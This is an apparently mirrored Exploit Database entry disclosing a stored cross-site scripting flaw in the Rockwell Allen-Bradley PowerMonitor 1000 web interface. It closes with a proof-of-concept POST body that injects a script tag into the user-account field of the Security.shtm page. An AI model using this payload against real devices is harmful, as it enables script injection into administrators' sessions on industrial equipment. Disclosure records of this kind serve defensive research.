Rockwell Automation Allen-Bradley PowerMonitor 1000 – Cross-Site Scripting

• Exploit Database
• 14 阅读

• 作者： Luca.Chiou
  日期： 2018-12-03
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/45928/

• # Exploit Title: Rockwell Automation Allen-Bradley PowerMonitor 1000 - Cross-Site Scripting
  # Date: 2018-11-27
  # Exploit Author: Luca.Chiou
  # Vendor Homepage: https://www.rockwellautomation.com/
  # Version: 1408-EM3A-ENT B
  # Tested on: It is a proprietary devices: https://ab.rockwellautomation.com/zh/Energy-Monitoring/1408-PowerMonitor-1000
  # CVE : N/A
  
  # 1. Description:
  # In Rockwell Automation Allen-Bradley PowerMonitor 1000 web page,
  # user can add a new user by access the /Security/Security.shtm.
  # When users add a new user, the new user’s account will in the post data.
  # Attackers can inject malicious XSS code in user’s account parameter of post data.
  # The user’s account parameter will be stored in database, so that cause a stored XSS vulnerability.
  
  # 2. Proof of Concept:
  # Browse http://<Your Modem IP>/Security/Security.shtm
  # In page Security.shtm, add a new user
  # Send this post data:
  
  /Security/cgi-bin/security|0|0|<script>alert(123)</script>